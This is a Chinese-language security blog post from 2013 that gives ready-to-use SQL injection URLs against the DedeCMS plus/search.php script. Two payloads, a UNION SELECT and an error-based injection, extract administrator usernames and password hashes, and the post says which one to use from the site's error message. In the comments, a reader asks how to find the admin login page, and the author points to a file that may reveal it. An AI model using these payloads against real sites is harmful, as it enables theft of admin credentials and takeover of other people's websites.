[通杀]dedecms plus/search.php 注入漏洞利用方式

作者:鬼哥

看结果如果提示
Safe Alert: Request Error step 2 !
那么直接用下面的exp

/plus/search.php?keyword=as&typeArr[111%3D@`'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`'`+]=a

看结果如果提示

QQ截图20130121095108

Safe Alert: Request Error step 1 !
那么直接用下面的exp

/plus/search.php?keyword=as&typeArr[111%3D@`'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`'`+]=a

20130121095349
如果正常显示证明漏洞不存在了。

本文固定链接: https://www.unhonker.com/bug/907.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年01月21日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: [通杀]dedecms plus/search.php 注入漏洞利用方式 | 90' s Blog|关注网络信息安全
关键字:

[通杀]dedecms plus/search.php 注入漏洞利用方式:目前有4 条留言

  1. 板凳
    shadow:

    请问博主,利用此漏洞或者登陆账号和密码,但是登陆需要后台地址,请问怎么才能获得?

    2013-08-16 20:22
    • honker90:

      /data/mysql_error_trace.inc

      但不一定通杀。。

      2013-08-18 03:35
      • shadow:

        这么晚,博主也还没睡?

        2013-08-18 03:59
  2. 沙发
    shadow:

    今天试了一下,貌似大多数网站是没有/data/mysql_error_trace.inc这个文件的,不过我测试的是V5.7版本的。

    2013-08-19 13:48

发表评论

您必须 [ 登录 ] 才能发表留言!